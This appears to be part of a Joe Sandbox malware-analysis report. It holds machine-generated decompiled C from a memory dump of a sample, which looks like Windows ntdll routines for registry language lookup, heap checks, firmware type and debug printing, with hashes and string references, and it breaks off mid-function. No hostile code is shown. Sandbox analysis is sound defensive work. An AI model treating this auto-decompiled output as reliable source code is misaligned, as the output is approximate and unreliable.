                    • Instruction Fuzzy Hash: C15116742402509AE774CE1EC884772FBF1DB48645F74889DEDC28B28BD279DC46DB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E0166E620(void* __ecx, short* __edx, short* _a4) {
                    				char _v16;
                    				char _v20;
                    				intOrPtr _v24;
                    				char* _v28;
                    				char _v32;
                    				char _v36;
                    				char _v44;
                    				signed int _v48;
                    				intOrPtr _v52;
                    				void* _v56;
                    				void* _v60;
                    				char _v64;
                    				void* _v68;
                    				void* _v76;
                    				void* _v84;
                    				signed int _t59;
                    				signed int _t74;
                    				signed short* _t75;
                    				signed int _t76;
                    				signed short* _t78;
                    				signed int _t83;
                    				short* _t93;
                    				signed short* _t94;
                    				short* _t96;
                    				void* _t97;
                    				signed int _t99;
                    				void* _t101;
                    				void* _t102;
                    
                    				_t80 = __ecx;
                    				_t101 = (_t99 & 0xfffffff8) - 0x34;
                    				_t96 = __edx;
                    				_v44 = __edx;
                    				_t78 = 0;
                    				_v56 = 0;
                    				if(__ecx == 0 || __edx == 0) {
                    					L28:
                    					_t97 = 0xc000000d;
                    				} else {
                    					_t93 = _a4;
                    					if(_t93 == 0) {
                    						goto L28;
                    					}
                    					_t78 = E0166F358(__ecx, 0xac);
                    					if(_t78 == 0) {
                    						_t97 = 0xc0000017;
                    						L6:
                    						if(_v56 != 0) {
                    							_push(_v56);
                    							E016A95D0();
                    						}
                    						if(_t78 != 0) {
                    							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                    						}
                    						return _t97;
                    					}
                    					E016AFA60(_t78, 0, 0x158);
                    					_v48 = _v48 & 0x00000000;
                    					_t102 = _t101 + 0xc;
                    					 *_t96 = 0;
                    					 *_t93 = 0;
                    					E016ABB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                    					_v36 = 0x18;
                    					_v28 =  &_v44;
                    					_v64 = 0;
                    					_push( &_v36);
                    					_push(0x20019);
                    					_v32 = 0;
                    					_push( &_v64);
                    					_v24 = 0x40;
                    					_v20 = 0;
                    					_v16 = 0;
                    					_t97 = E016A9600();
                    					if(_t97 < 0) {
                    						goto L6;
                    					}
                    					E016ABB40(0,  &_v36, L"InstallLanguageFallback");
                    					_push(0);
                    					_v48 = 4;
                    					_t97 = L0166F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                    					if(_t97 >= 0) {
                    						if(_v52 != 1) {
                    							L17:
                    							_t97 = 0xc0000001;
                    							goto L6;
                    						}
                    						_t59 =  *_t78 & 0x0000ffff;
                    						_t94 = _t78;
                    						_t83 = _t59;
                    						if(_t59 == 0) {
                    							L19:
                    							if(_t83 == 0) {
                    								L23:
                    								E016ABB40(_t83, _t102 + 0x24, _t78);
                    								if(L016743C0( &_v48,  &_v64) == 0) {
                    									goto L17;
                    								}
                    								_t84 = _v48;
                    								 *_v48 = _v56;
                    								if( *_t94 != 0) {
                    									E016ABB40(_t84, _t102 + 0x24, _t94);
                    									if(L016743C0( &_v48,  &_v64) != 0) {
                    										 *_a4 = _v56;
                    									} else {
                    										_t97 = 0xc0000001;
                    										 *_v48 = 0;
                    									}
                    								}
                    								goto L6;
                    							}
                    							_t83 = _t83 & 0x0000ffff;
                    							while(_t83 == 0x20) {
                    								_t94 =  &(_t94[1]);
                    								_t74 =  *_t94 & 0x0000ffff;
                    								_t83 = _t74;
                    								if(_t74 != 0) {
                    									continue;
                    								}
                    								goto L23;
                    							}
                    							goto L23;
                    						} else {
                    							goto L14;
                    						}
                    						while(1) {
                    							L14:
                    							_t27 =  &(_t94[1]); // 0x2
                    							_t75 = _t27;
                    							if(_t83 == 0x2c) {
                    								break;
                    							}
                    							_t94 = _t75;
                    							_t76 =  *_t94 & 0x0000ffff;
                    							_t83 = _t76;
                    							if(_t76 != 0) {
                    								continue;
                    							}
                    							goto L23;
                    						}
                    						 *_t94 = 0;
                    						_t94 = _t75;
                    						_t83 =  *_t75 & 0x0000ffff;
                    						goto L19;
                    					}
                    				}
                    			}


                    Strings
                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0166E68C
                    • InstallLanguageFallback, xrefs: 0166E6DB
                    • @, xrefs: 0166E6C0
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                    • API String ID: 0-1757540487
                    • Opcode ID: 0e1dc23e9700ef60e92d85440082222b80e9b75864dd8e4210b6829c72f9fa88
                    • Instruction ID: 449be4217e42240c471a3072ecfb0c1657be89ccdac4abdf49e6b53f7b7b7b08
                    • Opcode Fuzzy Hash: 0e1dc23e9700ef60e92d85440082222b80e9b75864dd8e4210b6829c72f9fa88
                    • Instruction Fuzzy Hash: 5151B1766093469BD710DF68CC50ABBB7E9EF88714F44492EF986D7240EB34D904C792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 60%
                    			E0168B8E4(unsigned int __edx) {
                    				void* __ecx;
                    				void* __edi;
                    				intOrPtr* _t16;
                    				intOrPtr _t18;
                    				void* _t27;
                    				void* _t28;
                    				unsigned int _t30;
                    				intOrPtr* _t31;
                    				unsigned int _t38;
                    				void* _t39;
                    				unsigned int _t40;
                    
                    				_t40 = __edx;
                    				_t39 = _t28;
                    				if( *0x1758748 >= 1) {
                    					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
                    					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
                    						_t18 =  *[fs:0x30];
                    						__eflags =  *(_t18 + 0xc);
                    						if( *(_t18 + 0xc) == 0) {
                    							_push("HEAP: ");
                    							E0166B150();
                    						} else {
                    							E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    						}
                    						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
                    						E0166B150();
                    						__eflags =  *0x1757bc8;
                    						if(__eflags == 0) {
                    							E01722073(_t27, 1, _t39, __eflags);
                    						}
                    					}
                    				}
                    				_t38 =  *(_t39 + 0xb8);
                    				if(_t38 != 0) {
                    					_t13 = _t40 >> 0xc;
                    					__eflags = _t13;
                    					while(1) {
                    						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
                    						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
                    							break;
                    						}
                    						_t30 =  *_t38;
                    						__eflags = _t30;
                    						if(_t30 != 0) {
                    							_t38 = _t30;
                    							continue;
                    						}
                    						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
                    						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
                    						break;
                    					}
                    					return E0168AB40(_t39, _t38, 0, _t13, _t40);
                    				} else {
                    					_t31 = _t39 + 0x8c;
                    					_t16 =  *_t31;
                    					while(_t31 != _t16) {
                    						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
                    						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
                    							return _t16;
                    						}
                    						_t16 =  *_t16;
                    					}
                    					return _t31;
                    				}
                    			}


                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-2558761708
                    • Opcode ID: e4c76f368c0f509e97980d2bc74193fe736ce86796b9517665bb2fdb97540d34
                    • Instruction ID: 366f5c1777c38df47730d7a432d8dfed07a14d4daef4daee678106b8386f327d
                    • Opcode Fuzzy Hash: e4c76f368c0f509e97980d2bc74193fe736ce86796b9517665bb2fdb97540d34
                    • Instruction Fuzzy Hash: A111E231714602DFDB29EB19CC94B3AB7AAEF41621F19826DE40ACB351E774D881C749
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 60%
                    			E0172E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                    				signed int _v20;
                    				char _v24;
                    				signed int _v40;
                    				char _v44;
                    				intOrPtr _v48;
                    				signed int _v52;
                    				unsigned int _v56;
                    				char _v60;
                    				signed int _v64;
                    				char _v68;
                    				signed int _v72;
                    				void* __ebx;
                    				void* __edi;
                    				char _t87;
                    				signed int _t90;
                    				signed int _t94;
                    				signed int _t100;
                    				intOrPtr* _t113;
                    				signed int _t122;
                    				void* _t132;
                    				void* _t135;
                    				signed int _t139;
                    				signed int* _t141;
                    				signed int _t146;
                    				signed int _t147;
                    				void* _t153;
                    				signed int _t155;
                    				signed int _t159;
                    				char _t166;
                    				void* _t172;
                    				void* _t176;
                    				signed int _t177;
                    				intOrPtr* _t179;
                    
                    				_t179 = __ecx;
                    				_v48 = __edx;
                    				_v68 = 0;
                    				_v72 = 0;
                    				_push(__ecx[1]);
                    				_push( *__ecx);
                    				_push(0);
                    				_t153 = 0x14;
                    				_t135 = _t153;
                    				_t132 = E0172BBBB(_t135, _t153);
                    				if(_t132 == 0) {
                    					_t166 = _v68;
                    					goto L43;
                    				} else {
                    					_t155 = 0;
                    					_v52 = 0;
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					_v56 = __ecx[1];
                    					if( *__ecx >> 8 < 2) {
                    						_t155 = 1;
                    						_v52 = 1;
                    					}
                    					_t139 = _a4;
                    					_t87 = (_t155 << 0xc) + _t139;
                    					_v60 = _t87;
                    					if(_t87 < _t139) {
                    						L11:
                    						_t166 = _v68;
                    						L12:
                    						if(_t132 != 0) {
                    							E0172BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                    						}
                    						L43:
                    						if(_v72 != 0) {
                    							_push( *((intOrPtr*)(_t179 + 4)));
                    							_push( *_t179);
                    							_push(0x8000);
                    							E0172AFDE( &_v72,  &_v60);
                    						}
                    						L46:
                    						return _t166;
                    					}
                    					_t90 =  *(_t179 + 0xc) & 0x40000000;
                    					asm("sbb edi, edi");
                    					_t172 = ( ~_t90 & 0x0000003c) + 4;
                    					if(_t90 != 0) {
                    						_push(0);
                    						_push(0x14);
                    						_push( &_v44);
                    						_push(3);
                    						_push(_t179);
                    						_push(0xffffffff);
                    						if(E016A9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                    							_push(_t139);
                    							E0172A80D(_t179, 1, _v40, 0);
                    							_t172 = 4;
                    						}
                    					}
                    					_t141 =  &_v72;
                    					if(E0172A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                    						_v64 = _a4;
                    						_t94 =  *(_t179 + 0xc) & 0x40000000;
                    						asm("sbb edi, edi");
                    						_t176 = ( ~_t94 & 0x0000003c) + 4;
                    						if(_t94 != 0) {
                    							_push(0);
                    							_push(0x14);
                    							_push( &_v24);
                    							_push(3);
                    							_push(_t179);
                    							_push(0xffffffff);
                    							if(E016A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                    								_push(_t141);
                    								E0172A80D(_t179, 1, _v20, 0);
                    								_t176 = 4;
                    							}
                    						}
                    						if(E0172A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                    							goto L11;
                    						} else {
                    							_t177 = _v64;
                    							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                    							_t100 = _v52 + _v52;
                    							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                    							 *(_t132 + 0x10) = _t146;
                    							asm("bsf eax, [esp+0x18]");
                    							_v52 = _t100;
                    							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                    							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                    							_t47 =  &_a8;
                    							 *_t47 = _a8 & 0x00000001;
                    							if( *_t47 == 0) {
                    								E01682280(_t179 + 0x30, _t179 + 0x30);
                    							}
                    							_t147 =  *(_t179 + 0x34);
                    							_t159 =  *(_t179 + 0x38) & 1;
                    							_v68 = 0;
                    							if(_t147 == 0) {
                    								L35:
                    								E0167B090(_t179 + 0x34, _t147, _v68, _t132);
                    								if(_a8 == 0) {
                    									E0167FFB0(_t132, _t177, _t179 + 0x30);
                    								}
                    								asm("lock xadd [eax], ecx");
                    								asm("lock xadd [eax], edx");
                    								_t132 = 0;
                    								_v72 = _v72 & 0;
                    								_v68 = _v72;
                    								if(E01687D50() == 0) {
                    									_t113 = 0x7ffe0388;
                    								} else {
                    									_t177 = _v64;
                    									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                    								}
                    								if( *_t113 == _t132) {
                    									_t166 = _v68;
                    									goto L46;
                    								} else {
                    									_t166 = _v68;
                    									E0171FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                    									goto L12;
                    								}
                    							} else {
                    								L23:
                    								while(1) {
                    									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                    										_t122 =  *_t147;
                    										if(_t159 == 0) {
                    											L32:
                    											if(_t122 == 0) {
                    												L34:
                    												_v68 = 0;
                    												goto L35;
                    											}
                    											L33:
                    											_t147 = _t122;
                    											continue;
                    										}
                    										if(_t122 == 0) {
                    											goto L34;
                    										}
                    										_t122 = _t122 ^ _t147;
                    										goto L32;
                    									}
                    									_t122 =  *(_t147 + 4);
                    									if(_t159 == 0) {
                    										L27:
                    										if(_t122 != 0) {
                    											goto L33;
                    										}
                    										L28:
                    										_v68 = 1;
                    										goto L35;
                    									}
                    									if(_t122 == 0) {
                    										goto L28;
                    									}
                    									_t122 = _t122 ^ _t147;
                    									goto L27;
                    								}
                    							}
                    						}
                    					}
                    					_v72 = _v72 & 0x00000000;
                    					goto L11;
                    				}
                    			}

                    0x0172e691
                    0x0172e691
                    0x0172e66e
                    0x0172e6b0
                    0x00000000
                    0x0172e6b6
                    0x0172e6bd
                    0x0172e6c7
                    0x0172e6d7
                    0x0172e6d9
                    0x0172e6db
                    0x0172e6de
                    0x0172e6e3
                    0x0172e6f3
                    0x0172e6fc
                    0x0172e700
                    0x0172e700
                    0x0172e704
                    0x0172e70a
                    0x0172e70a
                    0x0172e713
                    0x0172e716
                    0x0172e719
                    0x0172e720
                    0x0172e761
                    0x0172e76b
                    0x0172e774
                    0x0172e77a
                    0x0172e77a
                    0x0172e78a
                    0x0172e791
                    0x0172e799
                    0x0172e79b
                    0x0172e79f
                    0x0172e7aa
                    0x0172e7c0
                    0x0172e7ac
                    0x0172e7b2
                    0x0172e7b9
                    0x0172e7b9
                    0x0172e7c7
                    0x0172e806
                    0x00000000
                    0x0172e7c9
                    0x0172e7d1
                    0x0172e7d8
                    0x00000000
                    0x0172e7d8
                    0x00000000
                    0x00000000
                    0x0172e722
                    0x0172e72e
                    0x0172e748
                    0x0172e74c
                    0x0172e754
                    0x0172e756
                    0x0172e75c
                    0x0172e75c
                    0x00000000
                    0x0172e75c
                    0x0172e758
                    0x0172e758
                    0x00000000
                    0x0172e758
                    0x0172e750
                    0x00000000
                    0x00000000
                    0x0172e752
                    0x00000000
                    0x0172e752
                    0x0172e730
                    0x0172e735
                    0x0172e73d
                    0x0172e73f
                    0x00000000
                    0x00000000
                    0x0172e741
                    0x0172e741
                    0x00000000
                    0x0172e741
                    0x0172e739
                    0x00000000
                    0x00000000
                    0x0172e73b
                    0x00000000
                    0x0172e73b
                    0x0172e722
                    0x0172e720
                    0x0172e6b0
                    0x0172e618
                    0x00000000
                    0x0172e618

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: `$`
                    • API String ID: 0-197956300
                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                    • Instruction ID: 5875c8e6f233ebb93f1cd316e69bb8da20c2b47447bd48e343cdd0f5d392a557
                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                    • Instruction Fuzzy Hash: 6C9171316043529FE725CE29C845B1BFBE6EF84714F14892DFA95CB280EB74E905CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E016E51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed short* _t63;
                    				signed int _t64;
                    				signed int _t65;
                    				signed int _t67;
                    				intOrPtr _t74;
                    				intOrPtr _t84;
                    				intOrPtr _t88;
                    				intOrPtr _t94;
                    				void* _t100;
                    				void* _t103;
                    				intOrPtr _t105;
                    				signed int _t106;
                    				short* _t108;
                    				signed int _t110;
                    				signed int _t113;
                    				signed int* _t115;
                    				signed short* _t117;
                    				void* _t118;
                    				void* _t119;
                    
                    				_push(0x80);
                    				_push(0x17405f0);
                    				E016BD0E8(__ebx, __edi, __esi);
                    				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                    				_t115 =  *(_t118 + 0xc);
                    				 *(_t118 - 0x7c) = _t115;
                    				 *((char*)(_t118 - 0x65)) = 0;
                    				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                    				_t113 = 0;
                    				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                    				 *((intOrPtr*)(_t118 - 4)) = 0;
                    				_t100 = __ecx;
                    				if(_t100 == 0) {
                    					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                    					E0167EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                    					 *((char*)(_t118 - 0x65)) = 1;
                    					_t63 =  *(_t118 - 0x90);
                    					_t101 = _t63[2];
                    					_t64 =  *_t63 & 0x0000ffff;
                    					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                    					L20:
                    					_t65 = _t64 >> 1;
                    					L21:
                    					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                    					if(_t108 == 0) {
                    						L27:
                    						 *_t115 = _t65 + 1;
                    						_t67 = 0xc0000023;
                    						L28:
                    						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                    						L29:
                    						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                    						E016E53CA(0);
                    						return E016BD130(0, _t113, _t115);
                    					}
                    					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                    						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                    							 *_t108 = 0;
                    						}
                    						goto L27;
                    					}
                    					 *_t115 = _t65;
                    					_t115 = _t65 + _t65;
                    					E016AF3E0(_t108, _t101, _t115);
                    					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                    					_t67 = 0;
                    					goto L28;
                    				}
                    				_t103 = _t100 - 1;
                    				if(_t103 == 0) {
                    					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                    					_t74 = E01683690(1, _t117, 0x1641810, _t118 - 0x74);
                    					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                    					_t101 = _t117[2];
                    					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                    					if(_t74 < 0) {
                    						_t64 =  *_t117 & 0x0000ffff;
                    						_t115 =  *(_t118 - 0x7c);
                    						goto L20;
                    					}
                    					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                    					_t115 =  *(_t118 - 0x7c);
                    					goto L21;
                    				}
                    				if(_t103 == 1) {
                    					_t105 = 4;
                    					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                    					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                    					_push(_t118 - 0x70);
                    					_push(0);
                    					_push(0);
                    					_push(_t105);
                    					_push(_t118 - 0x78);
                    					_push(0x6b);
                    					 *((intOrPtr*)(_t118 - 0x64)) = E016AAA90();
                    					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                    					_t113 = L01684620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                    					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                    					if(_t113 != 0) {
                    						_push(_t118 - 0x70);
                    						_push( *((intOrPtr*)(_t118 - 0x70)));
                    						_push(_t113);
                    						_push(4);
                    						_push(_t118 - 0x78);
                    						_push(0x6b);
                    						_t84 = E016AAA90();
                    						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                    						if(_t84 < 0) {
                    							goto L29;
                    						}
                    						_t110 = 0;
                    						_t106 = 0;
                    						while(1) {
                    							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                    							 *(_t118 - 0x88) = _t106;
                    							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                    								break;
                    							}
                    							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                    							_t106 = _t106 + 1;
                    						}
                    						_t88 = E016E500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                    						_t119 = _t119 + 0x1c;
                    						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                    						if(_t88 < 0) {
                    							goto L29;
                    						}
                    						_t101 = _t118 - 0x3c;
                    						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                    						goto L21;
                    					}
                    					_t67 = 0xc0000017;
                    					goto L28;
                    				}
                    				_push(0);
                    				_push(0x20);
                    				_push(_t118 - 0x60);
                    				_push(0x5a);
                    				_t94 = E016A9860();
                    				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                    				if(_t94 < 0) {
                    					goto L29;
                    				}
                    				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                    					_t101 = L"Legacy";
                    					_push(6);
                    				} else {
                    					_t101 = L"UEFI";
                    					_push(4);
                    				}
                    				_pop(_t65);
                    				goto L21;
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: Legacy$UEFI
                    • API String ID: 2994545307-634100481
                    • Opcode ID: 19c0ea0b0a9341517d5d8adf2fa1f5a33627ada018d8d91f44e7addc4b1befef
                    • Instruction ID: 3d5eeb777ec8e4128b717a6c0e0f582409bec7a2ffd839163585223cf0ac6de6
                    • Opcode Fuzzy Hash: 19c0ea0b0a9341517d5d8adf2fa1f5a33627ada018d8d91f44e7addc4b1befef
                    • Instruction Fuzzy Hash: 49518E75A016099FDB24DFA8CC44AADBBF9FF48704F14412DE60AEB241E7719941CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E0166B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                    				signed int _t65;
                    				signed short _t69;
                    				intOrPtr _t70;
                    				signed short _t85;
                    				void* _t86;
                    				signed short _t89;
                    				signed short _t91;
                    				intOrPtr _t92;
                    				intOrPtr _t97;
                    				intOrPtr* _t98;
                    				signed short _t99;
                    				signed short _t101;
                    				void* _t102;
                    				char* _t103;
                    				signed short _t104;
                    				intOrPtr* _t110;
                    				void* _t111;
                    				void* _t114;
                    				intOrPtr* _t115;
                    
                    				_t109 = __esi;
                    				_t108 = __edi;
                    				_t106 = __edx;
                    				_t95 = __ebx;
                    				_push(0x90);
                    				_push(0x173f7a8);
                    				E016BD0E8(__ebx, __edi, __esi);
                    				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                    				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                    				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                    				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                    				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                    				if(__edx == 0xffffffff) {
                    					L6:
                    					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                    					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                    					__eflags = _t65 & 0x00000002;
                    					if((_t65 & 0x00000002) != 0) {
                    						L3:
                    						L4:
                    						return E016BD130(_t95, _t108, _t109);
                    					}
                    					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                    					_t108 = 0;
                    					_t109 = 0;
                    					_t95 = 0;
                    					__eflags = 0;
                    					while(1) {
                    						__eflags = _t95 - 0x200;
                    						if(_t95 >= 0x200) {
                    							break;
                    						}
                    						E016AD000(0x80);
                    						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                    						_t108 = _t115;
                    						_t95 = _t95 - 0xffffff80;
                    						_t17 = _t114 - 4;
                    						 *_t17 =  *(_t114 - 4) & 0x00000000;
                    						__eflags =  *_t17;
                    						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                    						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                    						_t102 = _t110 + 1;
                    						do {
                    							_t85 =  *_t110;
                    							_t110 = _t110 + 1;
                    							__eflags = _t85;
                    						} while (_t85 != 0);
                    						_t111 = _t110 - _t102;
                    						_t21 = _t95 - 1; // -129
                    						_t86 = _t21;
                    						__eflags = _t111 - _t86;
                    						if(_t111 > _t86) {
                    							_t111 = _t86;
                    						}
                    						E016AF3E0(_t108, _t106, _t111);
                    						_t115 = _t115 + 0xc;
                    						_t103 = _t111 + _t108;
                    						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                    						_t89 = _t95 - _t111;
                    						__eflags = _t89;
                    						_push(0);
                    						if(_t89 == 0) {
                    							L15:
                    							_t109 = 0xc000000d;
                    							goto L16;
                    						} else {
                    							__eflags = _t89 - 0x7fffffff;
                    							if(_t89 <= 0x7fffffff) {
                    								L16:
                    								 *(_t114 - 0x94) = _t109;
                    								__eflags = _t109;
                    								if(_t109 < 0) {
                    									__eflags = _t89;
                    									if(_t89 != 0) {
                    										 *_t103 = 0;
                    									}
                    									L26:
                    									 *(_t114 - 0xa0) = _t109;
                    									 *(_t114 - 4) = 0xfffffffe;
                    									__eflags = _t109;
                    									if(_t109 >= 0) {
                    										L31:
                    										_t98 = _t108;
                    										_t39 = _t98 + 1; // 0x1
                    										_t106 = _t39;
                    										do {
                    											_t69 =  *_t98;
                    											_t98 = _t98 + 1;
                    											__eflags = _t69;
                    										} while (_t69 != 0);
                    										_t99 = _t98 - _t106;
                    										__eflags = _t99;
                    										L34:
                    										_t70 =  *[fs:0x30];
                    										__eflags =  *((char*)(_t70 + 2));
                    										if( *((char*)(_t70 + 2)) != 0) {
                    											L40:
                    											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                    											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                    											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                    											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                    											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                    											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                    											 *(_t114 - 4) = 1;
                    											_push(_t114 - 0x74);
                    											L016BDEF0(_t99, _t106);
                    											 *(_t114 - 4) = 0xfffffffe;
                    											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                    											goto L3;
                    										}
                    										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                    										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                    											goto L40;
                    										}
                    										_push( *((intOrPtr*)(_t114 + 8)));
                    										_push( *((intOrPtr*)(_t114 - 0x9c)));
                    										_push(_t99 & 0x0000ffff);
                    										_push(_t108);
                    										_push(1);
                    										_t101 = E016AB280();
                    										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                    										if( *((char*)(_t114 + 0x14)) == 1) {
                    											__eflags = _t101 - 0x80000003;
                    											if(_t101 == 0x80000003) {
                    												E016AB7E0(1);
                    												_t101 = 0;
                    												__eflags = 0;
                    											}
                    										}
                    										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                    										goto L4;
                    									}
                    									__eflags = _t109 - 0x80000005;
                    									if(_t109 == 0x80000005) {
                    										continue;
                    									}
                    									break;
                    								}
                    								 *(_t114 - 0x90) = 0;
                    								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                    								_t91 = E016AE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                    								_t115 = _t115 + 0x10;
                    								_t104 = _t91;
                    								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                    								__eflags = _t104;
                    								if(_t104 < 0) {
                    									L21:
                    									_t109 = 0x80000005;
                    									 *(_t114 - 0x90) = 0x80000005;
                    									L22:
